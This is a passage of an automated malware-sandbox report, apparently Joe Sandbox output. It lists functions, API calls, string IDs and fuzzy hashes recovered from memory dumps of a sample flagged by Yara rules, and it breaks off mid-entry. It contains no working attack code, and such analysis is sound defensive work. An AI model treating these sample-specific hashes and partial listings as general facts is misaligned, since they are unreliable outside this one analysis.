                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2684344702-1785270423
                                                                                  • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                  • Instruction ID: cb3a2859ed7aecbb53c8f7ff5db8590c6937c5e0b26f296ff23853c6e0f13c92
                                                                                  • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                  • Instruction Fuzzy Hash: CB01DB35700629ABCF01DF54D5808AE77B9EF89354B55006AEC06DB301DA34DE05DB60
                                                                                  Function 04856182 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 04856194
                                                                                    • Part of subcall function 04855161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 0485517E
                                                                                    • Part of subcall function 04855161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 04855193
                                                                                  • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 048561C7
                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 048561F2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2684344702-1785270423
                                                                                  • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                  • Instruction ID: 02e7c3b8183ac45d68bb455282117a46d2e27ed14867301f57c3c8e7c9b21ebf
                                                                                  • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                  • Instruction Fuzzy Hash: BE01D675600219ABCF01EF58C4809AE77FAEF89354B5005A5EC06EB301EA70FE059BA0
                                                                                  Function 0040D4EB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
                                                                                    • Part of subcall function 00410A71: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A84
                                                                                    • Part of subcall function 00410A71: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A8E
                                                                                  • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B7B
                                                                                  • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BC1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2524916244-1785270423
                                                                                  • Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                  • Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
                                                                                  • Opcode Fuzzy Hash: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                  • Instruction Fuzzy Hash: D201D6359042248BDF11AB50C450BFDB372AF84714F1440AADA116B3A5DBBCBE41C799
                                                                                  Function 0483D752 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 04841DC9
                                                                                    • Part of subcall function 04840CD8: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 04840CEB
                                                                                    • Part of subcall function 04840CD8: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 04840CF5
                                                                                  • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 04841DE2
                                                                                  • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 04841E28
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2524916244-1785270423
                                                                                  • Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                  • Instruction ID: 652297b377e16ee038a46f42b4584f494525dfe9996102f46943e03fce33e8d3
                                                                                  • Opcode Fuzzy Hash: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                  • Instruction Fuzzy Hash: 03018079A0022C8BEF15AB58C45C7AEB372AFC5354F184A55C901EB344DFB4BA45CB92
                                                                                  Function 0041DA2B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA73
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA81
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                  • String ID: 11@$pContext
                                                                                  • API String ID: 1687795959-1086721755
                                                                                  • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                  • Instruction ID: 9010ffe1b6885ba769d18c3576365b3581292a7ba769087c8389302fb8d97d4f
                                                                                  • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                  • Instruction Fuzzy Hash: B5F0593AB006159BCB04EB59DC45C5EF7A8AF85B64710007BFD01E3342CFB8EE058698
                                                                                  Function 0486016B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,004496AC,00000000,?,?,?,0486011C,00000000,?,048600BC,00000000,00457970,0000000C,04860213,00000000,00000002), ref: 0486018B
                                                                                  • GetProcAddress.KERNEL32(00000000,004496C4), ref: 0486019E
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0486011C,00000000,?,048600BC,00000000,00457970,0000000C,04860213,00000000,00000002), ref: 048601C1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: 11@
                                                                                  • API String ID: 4061214504-1785270423
                                                                                  • Opcode ID: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                                                  • Instruction ID: 166ba69933623210126384a9c8ae81fa87d031b1e4218e9160235a49216262a9
                                                                                  • Opcode Fuzzy Hash: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                                                  • Instruction Fuzzy Hash: BBF06834A00219FBDB11DF54DC49BAEBFB9EF05B12F1001A5F906E2150CB759A40DE99
                                                                                  Function 0483C8A4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0483C903
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw
                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                  • API String ID: 2005118841-1866435925
                                                                                  • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                                                  • Instruction ID: 55d9f554bf1c83dc2f99335fa0632c330f1ddda16c40fff7798f59c9b97bac00
                                                                                  • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                                                  • Instruction Fuzzy Hash: FBF02173D002086AEB04E958DC41BEA73945B0534AF04895BDD16F6082F7A4BA05C7D5
                                                                                  Function 00428DEC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                  • String ID: f(@
                                                                                  • API String ID: 3213686812-2560262586
                                                                                  • Opcode ID: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                                                  • Instruction ID: 69bc41ef776010156a50f9e736d675acab369240ea0dcafc6817c09100241395
                                                                                  • Opcode Fuzzy Hash: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                                                  • Instruction Fuzzy Hash: 1FF0E260B8432639FA2037A2BD0BBAA16150F24B0DF96042BBE0A991C3DE9C9551416D
                                                                                  Function 04870911 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_catchmake_shared
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 3472968176-2084237596
                                                                                  • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                  • Instruction ID: 22b5d8d7b851b30d07403dc8706d9aaeee922a49c1d6f46f41aee75bca33e3d1
                                                                                  • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                  • Instruction Fuzzy Hash: FBF04470900118CFEB13AFACC45165C7B60AF42708B854B92E944DB361D7B8FD54DB92
                                                                                  Function 0042DF9D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                  • String ID: f(@
                                                                                  • API String ID: 3213686812-2560262586
                                                                                  • Opcode ID: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                                                  • Instruction ID: 0285dfc7d7792d99b816c6e179ba3485ab9a4e2f62b66e3f0321d916b514c371
                                                                                  • Opcode Fuzzy Hash: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                                                  • Instruction Fuzzy Hash: EEF0557078432535FA203BA2BD0FB961A240F10B0EF56002BBF09991C3DEEC9690416D
                                                                                  Function 004242E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424319
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042432B
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00424339
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                  • String ID: pScheduler
                                                                                  • API String ID: 1381464787-923244539
                                                                                  • Opcode ID: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                                                  • Instruction ID: dcb9093c936754fa26cda4c49a5e66a6ec85891f206a073b4e5aa53fece02954
                                                                                  • Opcode Fuzzy Hash: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                                                  • Instruction Fuzzy Hash: 23F0A731B0122467C718FB55E842D9E77B99E403087D0816FB802A3182CF7CA949C69D
                                                                                  Function 0484E8A4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0484E8C6
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0484E8D9
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0484E8E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                  • String ID: 11@
                                                                                  • API String ID: 1990795212-1785270423
                                                                                  • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                  • Instruction ID: adb53cd1988e0d21c5611f4fccb51e09aac305d0317ead4e295b788ecb18924b
                                                                                  • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                  • Instruction Fuzzy Hash: 6EE06835B0010827CB00FB2CD805C6DB7E9AEC0A147100A26ED11E3351DFF4BA08C6C5
                                                                                  Function 0042E05D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E073
                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E082
                                                                                  • _free.LIBCMT ref: 0042E089
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFreeHandleLibrary_free
                                                                                  • String ID: -B
                                                                                  • API String ID: 621396759-1993606306
                                                                                  • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                  • Instruction ID: 17050b68875c52b9acd6c54ac6ffc846a702ed9b00f998fe1c0864977ee07d81
                                                                                  • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                  • Instruction Fuzzy Hash: E9E08632101A34AFD7315F57F808B57BBD4EF15722F54C52AE41911560C7B9AD82CB9C
                                                                                  Function 00415DAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DDA
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DE8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                  • String ID: pScheduler$version
                                                                                  • API String ID: 1687795959-3154422776
                                                                                  • Opcode ID: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                                                  • Instruction ID: 654ef00f808b34ad7b75b8e59998346ebad61dbc4125ce9a21f33dce7aa536fc
                                                                                  • Opcode Fuzzy Hash: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                                                  • Instruction Fuzzy Hash: 5CE04F30900608F6CB14AA55D80ABDD77A45B11749F60C02B7855610D29ABCA6D8CB4A
                                                                                  Function 004358B8 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: __alldvrm$_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1036877536-0
                                                                                  • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                  • Instruction ID: f9eb826db87fdf2ea4d980863b0040f81c60248b0af39ab0b887e88b27670142
                                                                                  • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                  • Instruction Fuzzy Hash: BEA14871A00B869FEB11DE18C8917AEFBE5EF19310F18426FE5859B381C27C9D41C799
                                                                                  Function 04865B1F Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __alldvrm$_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1036877536-0
                                                                                  • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                  • Instruction ID: 4ac6ba71f204261404d2d39e163e4875621f587d2a34c753477efeafb8097c3c
                                                                                  • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                  • Instruction Fuzzy Hash: E3A17872A00386BFEB21CF18E8917AEBBE4EF51304F184B7DD586DB281D678A941C751
                                                                                  Function 0043FA28 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                  • Instruction ID: 944ec9a8cfd15a85abea22ed7e483bbecdcf94b25d0ac16da2a86ed09b95ce29
                                                                                  • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                  • Instruction Fuzzy Hash: E8414771E00210AADB247BBBDC52ABF76A8EF4D334F14127BF418C6291D67C9D49826D
                                                                                  Function 0486FC8F Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                  • Instruction ID: 276477f23026957ab876e18629a7191b0f53c3b73a97c384c5861f9f74df6003
                                                                                  • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                  • Instruction Fuzzy Hash: 8A413A31A001047BFBA46FBCAC40ABE3AA5DF46774F140F15FB2AD62A0E6B0F5404663
                                                                                  Function 04866B24 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0486049A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 04866B71
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 04866BFA
                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 04866C0C
                                                                                  • __freea.LIBCMT ref: 04866C15
                                                                                    • Part of subcall function 0486392E: RtlAllocateHeap.NTDLL(00000000,0483DAFC,00000000), ref: 04863960
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                  • String ID:
                                                                                  • API String ID: 2652629310-0
                                                                                  • Opcode ID: abd3ea47fc0e6ec547c6b6e60874e5e084d68c1577f3dfc99b50f136594fac3b
                                                                                  • Instruction ID: 3a9c3ffda33f3f2a446911b11de43ef56fad5eb36f1a84b86add26055b83a18d
                                                                                  • Opcode Fuzzy Hash: abd3ea47fc0e6ec547c6b6e60874e5e084d68c1577f3dfc99b50f136594fac3b
                                                                                  • Instruction Fuzzy Hash: 7931C372A0065AABDF25DF64DC80DAE7BA9EF40714F044768EC16EB150FB35E950CBA0
                                                                                  Function 00401FB6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00000005), ref: 00401FCB
                                                                                  • UpdateWindow.USER32 ref: 00401FD3
                                                                                  • ShowWindow.USER32(00000000), ref: 00401FE7
                                                                                  • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040204A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$MoveUpdate
                                                                                  • String ID:
                                                                                  • API String ID: 1339878773-0
                                                                                  • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                  • Instruction ID: 839b3a4605fc6fa716c5a1e9d0f595454ae31d99f498b0463e76923fa4e42aa6
                                                                                  • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                  • Instruction Fuzzy Hash: 83016531E006109BC7258F19ED48A267BAAFFD5712B14803AF40C972B1D7B1EC42CB9C
                                                                                  Function 004290E9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00429103
                                                                                    • Part of subcall function 00429050: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042907F
                                                                                    • Part of subcall function 00429050: ___AdjustPointer.LIBCMT ref: 0042909A
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00429118
                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429129
                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00429151
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                  • String ID:
                                                                                  • API String ID: 737400349-0
                                                                                  • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                  • Instruction ID: c9ce71b37bf0ada561c0f38da96873ff120a9bb937dab02468c91de1f254ac1d
                                                                                  • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                  • Instruction Fuzzy Hash: F0018032200159BBDF12AE92DC46EEB3B69EF49758F444009FE0856121C33AEC71DBA8
                                                                                  Function 04859350 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0485936A
                                                                                    • Part of subcall function 048592B7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 048592E6
                                                                                    • Part of subcall function 048592B7: ___AdjustPointer.LIBCMT ref: 04859301
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0485937F
                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 04859390
